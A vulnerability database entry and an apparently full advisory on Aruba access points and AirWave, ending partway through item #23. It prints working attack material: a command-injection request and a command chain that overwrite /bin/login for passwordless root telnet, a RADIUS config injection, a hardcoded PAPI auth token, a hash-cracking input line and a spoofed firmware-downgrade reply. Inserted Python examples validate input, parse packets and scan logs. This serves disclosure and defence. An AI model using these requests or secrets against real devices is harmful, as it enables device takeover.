VARIoT IoT vulnerabilities database
| VAR-200702-0268 | CVE-2007-0932 | Aruba Mobility Controller vulnerable to privilege escalation |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, and denial-of-service conditions.
Aruba ArubaOS/Aruba Instant/AirWave Management - Multiple Vulnerabilities
-------------------------------------------------------------------------
Introduction
============
Multiple vulnerabilities were identified in Aruba AP, IAP and AMP devices. The
vulnerabilities were discovered during a black box security assessment and
therefore the vulnerability list should not be considered exhaustive. Several
of the high severity vulnerabilities listed in this report are related to the
Aruba proprietary PAPI protocol and allow remote compromise of affected devices.
Affected Software And Versions
==============================
- ArubaOS (all versions)
- AirWave Management Platform 8.x prior to 8.2
- Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1)
CVE
===
The following CVEs were assigned to the issues described in this report:
- CVE-2016-2031
- CVE-2016-2032
Vulnerability Overview
======================
1. AMP: RabbitMQ Management interface exposed
2. AMP: XSRF token uses weak calculation algorithm
3. AMP: Arbitrary modification of /etc/ntp.conf
4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)
5. (I)AP: Insecure transmission of login credentials (GET)
6. (I)AP: Built in privileged "support" account
7. (I)AP: Static password hash for support account
8. (I)AP: Unusual account identified ("arubasecretadmin")
9. (I)AP: Privileged remote code execution
10. (I)AP: Radius passwords allow arbitrary raddb commands
11. (I)AP: Unauthenticated disclosure of environment variables
12. (I)AP: Information disclosure by firmware checking functionality
13. (I)AP: Unauthenticated automated firmware update requests
14. (I)AP: Firmware updater does not check certificates
15. (I)AP: Forceful downgrade of FW versions possible
16. (I)AP: Firmware update check discloses machine certificate
17. (I)AP: Firmware is downloaded via unencrypted connection
18. (I)AP: Firmware update Challenge/Response does not protect the Client
19. (I)AP: Unencrypted private keys and certs
20. (I)AP: Potential signature private key
21. (I)AP: PAPI Endpoints exposed to all interfaces
22. (I)AP: PAPI Endpoint does not validate MD5 signatures
23. (I)AP: PAPI protocol encrypted with weak encryption algorithm
24. (I)AP: PAPI protocol authentication bypass
25. (I)AP: Broadcast with detailed system information (LLDP)
26. (I)AP: User passwords are encrypted with a static key
Vulnerability Details
=====================
---------------------------------------------
1. AMP: RabbitMQ Management interface exposed
---------------------------------------------
AMPs expose the management frontend for the RabbitMQ message queue on all
interfaces via tcp/15672 and tcp/55672.
# netstat -nltp | grep beam
tcp 0 0 127.0.0.1:5672 0.0.0.0:* LISTEN 2830/beam.smp
tcp 0 0 127.0.0.1:17716 0.0.0.0:* LISTEN 2830/beam.smp
tcp 0 0 0.0.0.0:15672 0.0.0.0:* LISTEN 2830/beam.smp
tcp 0 0 0.0.0.0:55672 0.0.0.0:* LISTEN 2830/beam.smp
The password for the default user "airwave" is stored in the world readable
file /etc/rabbitmq/rabbitmq.config in plaintext:
# ls -l /etc/rabbitmq/rabbitmq.config
-rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config
# grep default_ /etc/rabbitmq/rabbitmq.config
{default_user,<<"airwave">>},
{default_pass,<<"***REMOVED***">>}
--------------------------------------------------
2. AMP: XSRF token uses weak calculation algorithm
--------------------------------------------------
The XSRF token is calculated based on limited sources of entropy, consisting of
the user's time of login and a random number between 0 and 99999. The algorithm
is approximated by the following example Python script:
import base64, hashlib, random, time
base64.b64encode(hashlib.md5(('%d%5.5d' % (int(time.time()),
    random.randint(0, 99999))).encode()).digest())
-----------------------------------------------
3. AMP: Arbitrary modification of /etc/ntp.conf
-----------------------------------------------
Incorrect/missing filtering of input parameters allows injecting new lines and
arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the
web frontend.
POST /nf/pref_network? HTTP/1.1
Host: 192.168.131.162
[...]
id=&ip_1=192.168.131.162&hostname_1=foo.example.com&
subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1&
dns2_1=&eth1_enabled_1=0&eth1_ip_1=&eth1_netmask_1=&
ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save
The above POST request results in the following ntp.conf being generated:
# cat /etc/ntp.conf
[...]
server time1.example.com
foo
server time2.example.com
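Added example (not AirWave code): the request above fed to a writer that copies values verbatim, next to one that validates them first. The function names and the hostname rule are assumptions of this sketch.

```python
import ipaddress
import re
from urllib.parse import unquote

# Allow-list first: only characters a hostname or IP literal can contain.
# This also keeps IPv6 zone suffixes ("%...") away from the ipaddress parser,
# which on Python 3.9+ accepts almost any text as a zone id.
_SAFE_CHARS = re.compile(r"[A-Za-z0-9.:-]+")
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"%s(?:\.%s)*" % (_LABEL, _LABEL))


def render_unsafe(servers):
    """Mimics the behaviour shown above: values are written verbatim."""
    return "".join("server %s\n" % s for s in servers)


def valid_ntp_server(value):
    """True only for a literal IP address or a plain hostname."""
    if not _SAFE_CHARS.fullmatch(value):
        return False          # whitespace, CR/LF, quotes, '%', ...
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return len(value) <= 253 and _HOSTNAME.fullmatch(value) is not None


def render_safe(servers):
    """Validate every value before anything is written to ntp.conf."""
    bad = [s for s in servers if not valid_ntp_server(s)]
    if bad:
        raise ValueError("rejected NTP server value(s): %r" % bad)
    return "".join("server %s\n" % s for s in servers)


# The two NTP form fields from the request above, URL-decoded the way a web
# framework hands them to the application.
FORM = {"ntp1_1": "time1.example.com%0afoo", "ntp2_1": "time2.example.com"}
SERVERS = [unquote(FORM["ntp1_1"]), unquote(FORM["ntp2_1"])]

if __name__ == "__main__":
    print(render_unsafe(SERVERS))      # contains the injected "foo" line
    try:
        render_safe(SERVERS)
    except ValueError as exc:
        print(exc)
```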
------------------------------------------------------------------------------
4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)
------------------------------------------------------------------------------
PAPI packets sent from an AP to an AMP are authenticated with a cryptographic
checksum. The packet format is only partially known, as it's a proprietary
format created by Aruba. A typical PAPI packet sent to an AMP is as follows:
0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........
0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I..
0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F...
The following dissection of the above shown packet gives a more detailed
overview of the format:
49 72 ID
00 02 Version
64 69 86 2d PAPI Destination IP
7f 00 00 01 PAPI Source IP
01 00 Unknown1
01 00 Unknown2
20 1f PAPI Source Port
20 1e PAPI Destination Port
00 01 Unknown3
00 00 Unknown4
00 01 Sequence Number
3e f9 Unknown5
22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum
The checksum is based on an MD5 hash of a padded concatenation of all fields and
a secret token. The secret token is hardcoded in multiple binaries on the AMP
and can easily be retrieved via core Linux system tools:
$ strings /opt/airwave/bin/msgHandler | grep asd
asdf;lkj763
Using this secret token it is possible to craft valid PAPI packets and issue
commands to the AMP, bypassing the authentication based on the shared
secret / token. This can be exploited to compromise the device.
Random sampling of different software versions available on
Aruba's website confirmed that the shared secret is identical for all versions.
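The dissection above as a parser, applied to the sample packet; this is an added example, not Aruba's code. Field names follow the list above; parse_papi and describe are names chosen here.

```python
import ipaddress
import struct
from collections import namedtuple

# Field order and widths exactly as listed in the dissection above, in network
# byte order. The "unknownN" fields are carried through undecoded.
_LAYOUT = struct.Struct("!2sH4s4sHHHHHHHH16s")
PapiPacket = namedtuple(
    "PapiPacket",
    "magic version dst_ip src_ip unknown1 unknown2 src_port dst_port "
    "unknown3 unknown4 sequence unknown5 checksum",
)


def parse_papi(datagram):
    """Parse the 44-byte AP-to-AMP PAPI packet; raise ValueError if malformed."""
    if len(datagram) < _LAYOUT.size:
        raise ValueError("short datagram: %d bytes" % len(datagram))
    pkt = PapiPacket._make(_LAYOUT.unpack_from(datagram))
    if pkt.magic != b"\x49\x72":
        raise ValueError("not a PAPI packet (bad ID field)")
    return pkt._replace(
        dst_ip=ipaddress.IPv4Address(pkt.dst_ip),
        src_ip=ipaddress.IPv4Address(pkt.src_ip),
    )


def describe(pkt):
    """One-line summary suitable for a traffic log."""
    return "PAPI v%d %s:%d -> %s:%d seq=%d checksum=%s" % (
        pkt.version, pkt.src_ip, pkt.src_port,
        pkt.dst_ip, pkt.dst_port, pkt.sequence, pkt.checksum.hex(),
    )


# The sample packet from the hex dump above.
SAMPLE = bytes.fromhex(
    "49720002" "6469862d" "7f000001" "0100" "0100" "201f" "201e"
    "0001" "0000" "0001" "3ef9" "224905b3508940d35d9dd6af4698c1a6"
)

if __name__ == "__main__":
    print(describe(parse_papi(SAMPLE)))
```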
-------------------------------------------------------
5. AP: Insecure transmission of login credentials (GET)
-------------------------------------------------------
Username and password to authenticate with the AP web frontend are transmitted
through HTTP GET. This method should not be used in a form that transmits
sensitive data, because the data is displayed in clear text in the URL.
GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1
The login URL can potentially appear in proxy logs, the server logs or
browser history. This possibly discloses the authentication data to
unauthorized persons.
--------------------------------------------
6. AP: Built in privileged "support" account
--------------------------------------------
The APs provide a built-in system account called "support". When connected to
the restricted shell of the AP via SSH, issuing the command "support" triggers
a password request:
00:0b:86:XX:XX:XX# support
Password:
A quick internet search clarified that this password is meant for use by Aruba
engineers only:
http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760
Further research on that functionality led to the conclusion that it
provides root-privileged shell access to the underlying operating
system of the AP, provided the correct password is entered.
-----------------------------------------------
7. AP: Static password hash for support account
-----------------------------------------------
The password hash for the "support" account mentioned in vulnerability #6 is
stored in plaintext on the AP.
$ strings /aruba/bin/cli | grep ^bc5
bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14
Random sampling of different versions of Firmware images available on Aruba's
website confirmed that the password hash is identical for all versions. The
password check validating a given "support" password is based on the following
algorithm:
SALT + sha1(SALT + PASSWORD)
Where SALT equals the first 5 bytes of the password hash in binary
representation. It is possible to run a brute-force attack on this hash format
using JtR with the following input format:
support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601
------------------------------------------------------
8. AP: Unusual account identified ("arubasecretadmin")
------------------------------------------------------
The AP's system user configuration contains an undocumented account called
"arubasecretadmin". This account was the root cause for CVE-2007-0932 and
allowed administrative login with a static password.
/etc/passwd:
nobody:x:99:99:Nobody:/:/sbin/nologin
root:x:0:0:Root:/:/bin/sh
admin:x:100:100:Admin:/:/bin/telnet3
arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2
serial:x:102:100:Serial:/:/bin/telnet4
Further tests indicated that login with this account does not seem possible, as
it is not mapped through Aruba's authentication mechanisms. The reason it is
still configured on the system is unknown.
---------------------------------------
9. AP: Privileged remote code execution
---------------------------------------
Insufficient checking of parameters allows an attacker to execute commands
with root privileges on the AP. The vulnerable parameter is "image_url" which
is used in the Firmware update function.
GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084
HTTP/1.1
The above example starts a new instance of mini_httpd on tcp/1234, which allows
browsing the AP's filesystem. The following list of commands, if executed in
order, starts a telnet service that allows passwordless root login.
killall -9 utelnetd
touch /tmp/telnet_enable
echo \#\!/bin/sh > /bin/login
echo /bin/sh >> /bin/login
chmod +x /bin/login
/sbin/utelnetd
Connecting to the telnet service started by the above command chain:
# telnet 10.0.XX.XX
Trying 10.0.XX.XX...
Connected to 10.0.XX.XX.
Escape character is '^]'.
Switching to Full Access
/aruba/bin # echo $USER
root
/aruba/bin #
Potential exploits of this vulnerability can be detected through the
AP's log file:
[...]
Jan 1 02:43:47 cli[2052]: <341004> <WARN> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| http://10.0.XX.XX/?"`/sbin/utelnetd`"
[...]
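Added example (not part of the original advisory): a log check built on the entry above, flagging cli messages whose URL carries shell metacharacters. The first sample line is the entry quoted above joined onto one line; the other two are constructed, and the token list is an assumption to tune per environment.

```python
import re

# Syslog line as shown above: timestamp, "cli[pid]:", then free text with a URL.
_CLI_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+cli\[\d+\]:\s+(?P<msg>.*)$"
)
_URL = re.compile(r"https?://\S+")

# Tokens a firmware image URL never needs but a shell interprets.
_SHELL_TOKENS = (
    ("`", "backtick"),
    ("$(", "dollar-paren"),
    (";", "semicolon"),
    ("|", "pipe"),
    ('"', "double-quote"),
    ("'", "single-quote"),
)


def scan(lines):
    """Return one finding per logged URL that contains shell metacharacters."""
    findings = []
    for line in lines:
        m = _CLI_LINE.match(line)
        if not m:
            continue                      # not a cli[...] message
        for url in _URL.findall(m.group("msg")):
            reasons = [name for tok, name in _SHELL_TOKENS if tok in url]
            if reasons:
                findings.append(
                    {"time": m.group("ts"), "url": url, "reasons": reasons}
                )
    return findings


SAMPLE_LOG = [
    # constructed: cli message with an ordinary image URL
    "Jan 1 02:40:11 cli[2052]: <341004> <WARN> |AP 00:0b:86:XX:XX:XX@10.0.XX.XX cli| "
    "http://10.0.XX.XX/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810",
    # the entry from the advisory, joined onto one line
    "Jan 1 02:43:47 cli[2052]: <341004> <WARN> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| "
    'http://10.0.XX.XX/?"`/sbin/utelnetd`"',
    # constructed: message from another process, ignored by the scanner
    "Jan 1 02:44:02 nanny[1201]: restarting process",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["reasons"], finding["url"])
```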
-------------------------------------------------------
10. AP: Radius passwords allow arbitrary raddb commands
-------------------------------------------------------
Insufficient checking of the GET parameter "cmd" allows the injection of
arbitrary commands and configuration parameters in the raddb configuration.
Example:
GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548
HTTP/1.1
/aruba/radius/raddb/users:
foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah"
As shown in the above example, inserting a double-quote in the password allows
additional commands to be added after the password.
-----------------------------------------------------------
11. AP: Unauthenticated disclosure of environment variables
-----------------------------------------------------------
It is possible to request a listing of environment variables by requesting a
specific URL on the AP's web server. The request does not require
authentication.
GET /swarm.cgi?opcode=printenv HTTP/1.1
HTTP/1.0 200 OK
Content-Type:text/plain; charset=utf-8
Pragma: no-cache
Cache-Control: max-age=0, no-store
Environment variables
CHILD_INDEX=0
PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/lib
SERVER_SOFTWARE=
SERVER_NAME=10.0.XX.XX
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
SERVER_PORT=4343
REQUEST_METHOD=GET
SCRIPT_NAME=/swarm.cgi
QUERY_STRING=opcode=printenv
REMOTE_ADDR=10.0.XX.XX
REMOTE_PORT=58804
HTTP_REFERER=https://10.0.XX.XX:4343/
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0
HTTP_HOST=10.0.XX.XX:4343
-----------------------------------------------------------------
12. AP: Information disclosure by firmware checking functionality
-----------------------------------------------------------------
When the AP checks device.arubanetworks.com for a new firmware version, it
sends detailed information of the AP in plaintext to the remote host.
POST /firmware HTTP/1.1
Host: device.arubanetworks.com
Content-Length: 2
Connection: keep-alive
X-Type: firmware-check
X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X-OEM-Tag: Aruba
X-Mode: IAP
X-Factory-Default: Yes
X-Current-Version: 6.4.2.6-4.1.1.10_51810
X-Organization: ***REMOVED (Company Internal Name)***
X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155
X-Features: 0000100001001000000000000000000000000000000000010000000
----------------------------------------------------------
13. AP: Unauthenticated automated firmware update requests
----------------------------------------------------------
The web frontend of the AP provides functionality to initiate an automated
firmware update. Doing so triggers the AP to initiate communication with
device.arubanetworks.com and automatically download and install a new firmware
image. The CGI opcode for that automatic update is "image-server-check" and it
was discovered that the "sid" parameter is not checked for this opcode. Therefore,
an attacker can issue the automatic firmware update without authentication by
sending the following GET request to the AP.
GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x
As shown above, the "sid" parameter has to be submitted as part of the URL, but
can be set to anything. Although all opcode actions follow the same calling
scheme, "image-server-check" was the only opcode where the session ID was not
validated.
Combined with other vulnerabilities (#14, #15), this could be exploited to
install an outdated, vulnerable firmware on the AP.
----------------------------------------------------
14. AP: Firmware updater does not check certificates
----------------------------------------------------
The communication between AP and device.arubanetworks.com is secured by using
SSL. The AP does not do proper certificate validation for the communication to
device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a
self-signed certificate allowed interception of the traffic between AP and
device.arubanetworks.com.
--------------------------------------------------
15. AP: Forceful downgrade of FW versions possible
--------------------------------------------------
When checking device.arubanetworks.com for a new firmware image, the AP sends
its current version to the remote host. If there is no new firmware available,
device.arubanetworks.com does not provide any download options. If the initial
version sent from the AP is modified by an attacker (via MiTM), the remote
server will reply with the current firmware version. The AP will then reject
that firmware, as its current version is more recent/the same. Downgrading the
version also does not work, because of the validation the AP performs.
This behaviour can be overridden if an attacker intercepts and modifies the
reply from device.arubanetworks.com and adds an X-header called
"X-Mandatory-Upgrade".
Example of a spoofed reply from device.arubanetworks.com:
HTTP/1.0 200 OK
Date: Wed, 11 Nov 2015 12:12:20 GMT
Content-Length: 91
Content-Type: text/plain; charset=UTF-8
X-Activation-Key: FXXXXXXX
X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e
X-Status-Code: success
X-Type: firmware-check
X-Mandatory-Upgrade: true
Connection: close
6.4.2.6-4.1.1.10_51810
23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810
As shown above, the header "X-Mandatory-Upgrade" was added to the server's
reply. This causes the AP to skip its validation checks and accept any firmware
version provided, regardless of whether it is the same as or older than the
current one.
-----------------------------------------------------------
16. AP: Firmware update check discloses machine certificate
-----------------------------------------------------------
While observing the traffic between an AP and device.arubanetworks.com, it was
discovered that the AP discloses its machine certificate to the remote
endpoint.
POST /firmware HTTP/1.1
Host: 10.0.XX.XX
Content-Length: 2504
Connection: close
X-Type: firmware-check
X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X-OEM-Tag: Aruba
X-Mode: IAP
X-Factory-Default: Yes
X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec
X-Current-Version: 6.4.2.6-4.1.1.10_51810
X-Organization: ***REMOVED (Company Internal Name)***
X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155
X-Features: 0000100001001000000000000000000000000000000000010000000
X-Challenge-Hash: SHA-1
-----BEGIN CERTIFICATE-----
MIIGTjCCBTagAwI...
[...]
-----END CERTIFICATE-----
The certificate sent in the above request is the same (in PEM format) as found
under the following path on the AP:
/tmp/deviceCerts/certifiedKeyCert.der
Comparison of the certificate from the HTTP Request and from the AP filesystem:
$ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem
68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8  dumped-fw-cert.txt
68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8  certifiedKeyCert.der.pem
---------------------------------------------------------
17. AP: Firmware is downloaded via unencrypted connection
---------------------------------------------------------
Firmware images are downloaded via unencrypted HTTP to the AP. An example reply
containing the download paths looks as follows:
HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 13:18:58 GMT
Content-Length: 552
Content-Type: text/plain; charset=UTF-8
X-Activation-Key: FXXXXXXX
X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e
X-Status-Code: success
X-Type: firmware-check
Connection: close
6.4.2.6-4.1.1.10_51810
25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810
30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810
15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810
10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810
23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810
26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810
An attacker could potentially MiTM connections to images.arubanetworks.com and
possibly replace the firmware images downloaded by the AP.
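Added example, not Aruba's updater: a parser for the reply format shown in #15 and #17 with the checks the AP lacks. It refuses non-HTTPS or unexpected image hosts and any version that is not newer, whatever X-Mandatory-Upgrade says. The component-wise version ordering, the allowed host set and the newer version string are assumptions; image signature verification is out of scope here.

```python
import re
from urllib.parse import urlsplit


def parse_version(text):
    """'6.4.2.6-4.1.1.10_51810' -> (6, 4, 2, 6, 4, 1, 1, 10, 51810).
    Assumption: versions order component by component, numerically."""
    if not re.fullmatch(r"\d+(?:[._-]\d+)*", text):
        raise ValueError("malformed version: %r" % text)
    return tuple(int(part) for part in re.split(r"[._-]", text))


def parse_reply(raw):
    """Return (headers, offered_version, [(class_id, url), ...])."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:            # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    lines = [ln.strip() for ln in body.split("\n") if ln.strip()]
    if not lines:
        raise ValueError("reply carries no version line")
    images = []
    for line in lines[1:]:                       # "<class id> <image url>"
        class_id, _, url = line.partition(" ")
        images.append((class_id, url.strip()))
    return headers, lines[0], images


def check_offer(raw, installed, allowed_hosts):
    """List every reason to refuse the offer; an empty list means acceptable."""
    headers, offered, images = parse_reply(raw)
    problems = []
    if parse_version(offered) <= parse_version(installed):
        problems.append("offered version %s is not newer than installed %s"
                        % (offered, installed))
        if "x-mandatory-upgrade" in headers:
            problems.append("X-Mandatory-Upgrade ignored for a non-upgrade")
    for class_id, url in images:
        parts = urlsplit(url)
        if parts.scheme != "https":
            problems.append("image %s: not HTTPS (%s)" % (class_id, url))
        if parts.hostname not in allowed_hosts:
            problems.append("image %s: unexpected host %s"
                            % (class_id, parts.hostname))
    return problems


INSTALLED = "6.4.2.6-4.1.1.10_51810"
ALLOWED_HOSTS = {"images.arubanetworks.com"}     # assumption for this sketch

# The spoofed reply from #15, reduced to the headers that matter here.
SPOOFED = (
    "HTTP/1.0 200 OK\r\nX-Status-Code: success\r\nX-Type: firmware-check\r\n"
    "X-Mandatory-Upgrade: true\r\nConnection: close\r\n\r\n"
    "6.4.2.6-4.1.1.10_51810\n"
    "23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n"
)
# Constructed reply: newer (made-up) version, HTTPS, expected host.
ACCEPTABLE = (
    "HTTP/1.1 200 OK\r\nX-Status-Code: success\r\nX-Type: firmware-check\r\n\r\n"
    "6.4.2.6-4.1.1.11_52000\n"
    "23 https://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.11_52000\n"
)

if __name__ == "__main__":
    for problem in check_offer(SPOOFED, INSTALLED, ALLOWED_HOSTS):
        print("refuse:", problem)
```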
----------------------------------------------------------------------
18. AP: Firmware update Challenge/Response does not protect the Client
----------------------------------------------------------------------
The update check process between AP and device.arubanetworks.com works
as follows:
AP => device.arubanetworks.com
POST /firmware
X-Type: firmware-check
AP <= device.arubanetworks.com
200 OK
X-Session-Id: bd4...
X-Challenge: 123123...
AP => device.arubanetworks.com
POST /firmware
X-Session-Id: bd4...
[machine certificate]
[signature]
AP <= device.arubanetworks.com
200 OK
X-Session-Id: bd4...
[firmware image urls]
When inspecting the communication process carefully, it is clear that the final
response from device.arubanetworks.com does not contain any (cryptographic)
signature. An attacker could impersonate device.arubanetworks.com, send an
arbitrary challenge, ignore the response and just reply with a list of firmware
images. The only thing that has to be kept the same over requests is the
X-Session-Id header, which is also sent initially by the remote host and not
the AP and therefore under full control of the attacker.
------------------------------------------
19. AP: Unencrypted private keys and certs
------------------------------------------
The AP firmware image contains the unencrypted private key and certificate for
securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key
and cert were found under the path /aruba/conf/cpprivkey.pem.
$ openssl x509 -in cpprivkey.pem -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 121426 (0x1da52)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL,
CN=GeoTrust DV SSL CA
Validity
Not Before: May 11 01:22:10 2011 GMT
Not After : Aug 11 04:40:59 2017 GMT
Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF,
C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See
www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated -
QuickSSL(R) Premium, CN=securelogin.arubanetworks.com
[...]
$ openssl rsa -in cpprivkey.pem -check
RSA key ok
writing RSA key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA….
[...]
-----END RSA PRIVATE KEY-----
---------------------------------------
20. AP: Potential signature private key
---------------------------------------
A potential SSL key was found under the path /etc/sig.key. Based on the header
(3082xxxx[02,03]82), the file looks like an SSL key in DER format:
$ xxd etc/sig.key
00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q....
It was not possible to decode the key. Therefore it's not 100% clear if it is an
actual key or just a garbage file.
------------------------------------------------
21. AP: PAPI Endpoints exposed to all interfaces
------------------------------------------------
The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore
it is reachable via wired and wireless connections to the AP. This increases
the potential attack surface.
# netstat -nlu | grep :82
udp 0 0 :::8209 :::*
udp 0 0 :::8211 :::*
Additionally, the local ACL table of the AP contains a default firewall rule
permitting any traffic to udp/8209-8211, overriding any manually set ACL to
block access to PAPI:
00:0b:86:XX:XX:XX# show datapath acl 106
Datapath ACL 106 Entries
-----------------------
Flags: P - permit, L - log, E - established, M/e - MAC/etype filter
S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror
I - Invert SA, i - Invert DA, H - high prio, O - set prio, C -
Classify Media
A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6
K - App Throttle, d - Domain DA
----------------------------------------------------------------
1: any any 17 0-65535 8209-8211 P4
[...]
12: any any any P4
00:0b:86:XX:XX:XX#
------------------------------------------------------
22. AP: PAPI Endpoint does not validate MD5 signatures
------------------------------------------------------
MD5 signature validation for incoming PAPI packets is disabled on the AP:
# ps | grep msgHandler
1988 root 508 S < /aruba/bin/msgHandler -n
# /aruba/bin/msgHandler -h
usage: msgHandler [-d] [-n]
-d = enable debug prints.
-n = disable md5 signatures.
-g = disable garbling.
The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5
signature validation:
# grep msgH /aruba/bin/nanny_list
RESTART /aruba/bin/msgHandler -n
--------------------------------------------------------------
23. AP: PAPI protocol encrypted with weak encryption algorithm
--------------------------------------------------------------
PAPI packets sent to an AP contain an encrypted payload. The encryption seems
to replace the MD5 signature check as described in #4 and used when PAPI is
sent from AP to AMP. This might also explain why the PAPI endpoint runs with
disabled MD5 signature verification on the AP (see #22).
The following example shows an encrypted PAPI packet for the command
"show version" as received by the AP:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................
0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n..........
0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................
0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................
0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ...........
Important parts of the above packet:
7f 00 00 01 Destination IP (127.0.0.1)
0a 00 00 01 Source IP (10.0.0.1)
3b 60 Destination Port (15200)
3b 7e Source Port (15230)
97 93 93 93-EOF Encrypted PAPI payload
Comparison of the above packet with a typical PAPI packet that is sent from the
AP to the AMP quickly highlights the missing 0x00 that are used to pad certain
fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which
is a clear indication that the payload is "encrypted" with a 1 byte XOR. As
XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore
discloses the key used and use of the weak XOR algorithm:
0x00: 00000000
